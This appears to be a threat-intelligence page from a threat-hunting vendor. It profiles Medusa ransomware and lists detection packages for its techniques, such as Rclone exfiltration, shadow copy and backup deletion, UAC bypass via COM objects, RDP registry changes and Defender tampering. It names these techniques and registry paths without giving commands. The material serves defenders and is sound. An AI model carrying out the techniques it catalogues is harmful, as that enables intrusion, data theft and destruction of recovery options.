Threat Overview - Medusa Ransomware
UPDATE 03/25/2025: Since June 2021, Medusa ransomware, operating as a ransomware-as-a-service (RaaS), has been confirmed to have compromised over 300 organizations across critical infrastructure sectors, including healthcare, education, legal, insurance, technology, and manufacturing. In March of 2025, CISA released a Cybersecurity Advisory as a part of their @StopRansomware effort, offering technical details that were identified through recent FBI investigations. The actors exploit unpatched vulnerabilities in public-facing applications and often collaborate with initial access brokers to infiltrate networks. They have been observed to employ living-off-the-land techniques, leveraging legitimate system tools like PowerShell and Windows Management Instrumentation (WMI) for reconnaissance and lateral movement. Medusa affiliates deploy tools such as Mimikatz for credential harvesting and use software deployment utilities like PDQ Deploy and PsExec to distribute the ransomware payload. As mentioned in the earlier release of this collection, the ransomware encrypts data using AES-256 encryption, appends the ".medusa" extension to affected files, and deletes volume shadow copies to inhibit system recovery. In conjunction with the advisory released by CISA, threat hunters at Intel471 have updated the collection with additional Hunt Packages related to the following:
- Installation(and usage) of malicious tooling
- Privilege escalation via user addition(s) to security groupings
- Manipulation of RDP related settings to forcing a system to be more susceptible
Prior Information: Medusa Ransomware is a variant that was believed to have emerged in June 2021 and has been becoming increasingly prolific as of late. While \u201cMedusa\u201d has been commonly used in the name of other ransomware, malware, and botnets, it is distinct from its similarly named competitors (such as MedusaLocker). The ransomware claims to exfiltrate data from compromised organizations to perform a "double-extortion attack", this is a type of attack in which the threat actor will not only encrypt compromised systems, but also sell or release the exfiltrated data publicly if a ransom is not met. Medusa Ransomware uses a .MEDUSA file extension for files it encrypts. Medusa Ransomware is considered to be an active threat, and thus poses a significant and present risk that should be ascertained and prepared for.
Medusa Ransomware Hunt Package Collection
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
Related Hunt Packages
Rclone Activity - Potential Data Exfiltration
Rclone is a command-line tool used to manage (and potentially exfiltrate) files on cloud storage. A larger number of ransomware cases have been uncovered where Rclone has been utilized to exfiltrate files off of victim machines.
ACCESS HUNT PACKAGE
Excessive Process and Service Stop Attempts - Potential Malware Infection
Malware and Ransomware often kill legitimate services that could detect it's activities before executing their commands. This package is intended to identify excessive occurrences of a process killing services.
ACCESS HUNT PACKAGE
Enabling RDP Connections through Registry Modification
This content is designed to detect when the registry key that enabled and disables Remote Desktop protocol (RDP) connections (HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server) is modified. This type of activity has been seen in the use of the SmokedHam tool from UNC2465 and its affiliates. False positives may occur depending on the environment per company, as these registry keys can be modified by admins.
ACCESS HUNT PACKAGE
Suspicious BITS Activity - ScriptBlock
This package identifies activity in Powershell Logging associated with BITS either with bitsadmin.exe or the BITS cmdlets and module in PowerShell.
ACCESS HUNT PACKAGE
Suspicious BITS Activity
This package identifies activity associated with BITS either with bitsadmin.exe or the BITS cmdlets and module in powershell.
ACCESS HUNT PACKAGE
Possible Delayed Execution in CommandLine Argument Using Ping.exe and Loopback Address
This content is designed to detect when ping.exe contains a flag (-n) with a high number and targets any loopback address. This technique is sometimes used to delay the rest, or a chained command, of the command from executing.
ACCESS HUNT PACKAGE
SoftPerfect Network Scanner Write File Validation
This Threat Hunt package identifies the use of the SoftPerfect Network Scanning tool when leveraged to find share drives that allow write access for the user account being utilized. For additional logging requirements see Deployments Steps within tool queries.
ACCESS HUNT PACKAGE
Taskkill.exe executed multiple times in a short period
This hunt is designed to capture when taskkill.exe is used multiple times on a single endpoint or in the entire environment in a short period of time. This behavior has been observed in relation to ransomware and other malicious software or actors when they attempt to cover their tracks or to disable security software on a compromised machine.
ACCESS HUNT PACKAGE
Potential Exfiltration - Common Rclone Arguments
This will identify processes executed with common arguments associated with rclone activity used to exfiltrate.
ACCESS HUNT PACKAGE
UAC Bypass Attempt via Elevated COM Abuse
This content is designed to detect User Account Control Bypass attempts abusing common COM interfaces within the registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\UAC\\COMAutoApprovalList. These COM Objects are designed to start at a higher integrity level and can be manipulated to open another process at the same higher level.
ACCESS HUNT PACKAGE
UAC Bypass Method - Cmstplua COM (Process Execution)
This content is designed to detect when the UAC Bypass method is executed via DllHost.exe OR CMSTP.exe.
ACCESS HUNT PACKAGE
Disabling Windows Security Services via Registry Edit Methods
This hunt package is designed to identify any attempt to disable Windows security services through the modification of the Windows registry. Windows security services are crucial to maintaining the security of a system and disabling them could potentially compromise the system's security posture, allowing an attacker to run code without security protections in place.
ACCESS HUNT PACKAGE
CertUtil file download
Identify suspicious downloads with the built-in windows tool CertUtil. CertUtil is typically not utilized to download executables or files in general from the web, as such its usage to download files from the Internet should be considered suspicious.
ACCESS HUNT PACKAGE
Excessive Windows Discovery and Execution Processes - Potential Malware Installation
This package utilizes a list of commonly abused LOLB which an attacker or malware would execute in quick succession. The presence of multiple executions of the programs within the list can be indicative of an infection or malicious activity occurring on a victim host. To reduce false positives, distinct counts per process name can be utilized to ensure over 5 unique processes from the list were executed versus just checking more than 6 events were generated on the host.
ACCESS HUNT PACKAGE
Attempted Backup Deletion - Potential Ransomware Activity
This Hunt Package focuses on identifying commands associated with the deletion of backups, which is common activity among various ransomware groups. The provided hunt logic will identify processes that run commands associated with backup deletion and provide relevant context around the activity.
ACCESS HUNT PACKAGE
Volume Shadow Copy Service Disabled
This package is designed to capture the surrounding activity when the service related to Volume Shadow Copy Service is disabled.
ACCESS HUNT PACKAGE
Advanced IP Scanner Tool Utilization
This Threat Hunt package identifies instances where Advanced IP Scanner tool was used within a target environment, which may be leveraged by malicious actors to perform network discovery actions. This package can also identify activity even if the execution is run as a portable exe instead of an installation of the tool.
ACCESS HUNT PACKAGE
RDP Enabled Via NETSH
This hunt package is designed to capture the activity surrounding commandline arguments being executed in order to enable Remote Desktop Protocol (RDP).
ACCESS HUNT PACKAGES
Resize Shadow Storage with 'vssadmin'
This will identify vssadmin use to resize the shadowstorage, which is a methodology used by a few ransomware actors to increase their success to impact recovery.
ACCESS HUNT PACKAGE
User Added to Default Privileged Windows Security Groups
This package is designed to capture the activity surrounding the execution of command line arguments that add a user to default privileged Windows Security Groups (local and domain).
ACCESS HUNT PACKAGE
Suspicious bcdedit Activity - Potential Ransomware
BCDEdit is a command-line tool for managing Boot Configuration Data (BCD). Ransomware is known to utilize bcdedit to modify the boot configuration to prevent recovery. The intent of this package is to identify when bcdedit is being utilized with several common malicious commands, such as delete and safeboot.
ACCESS HUNT PACKAGE
Shadow Copies Deletion Using Operating Systems Utilities
Ransomware is known to delete Windows shadow copies before it begins encrypting the data on the victim host. This tactic is typically carried out with powershell, vssadmin or wmic. This package identifies activity by powershell, wmic, vssadmin or vssvc with command line arguments containing delete and variations of shadow.
ACCESS HUNT PACKAGE
Common Ransomware Encrypted File Extensions
Ransomware commonly modifies the file extensions of data they have victimized during their attacks. The most common file extensions linked to Ransomware can be identified and assist in associating what variant is behind the malicious activity.
ACCESS HUNT PACKAGE
Powershell Encoded Command Execution
Looks for valid variations of the -EncodedCommand parameter. This is commonly used to encode or obfuscate commands, and not all occurrences are malicious. For example, benign complex commands may require encoding to properly run on a target system. Analysis of the encoded command by base64 decoding the encoded data will be necessary.
Windows Defender Tampering - Possible Malware Activity
This package is designed to identify when PowerShell is utilized to tamper with Windows Defender in a way that would make a machine easier to compromise.
ACCESS HUNT PACKAGE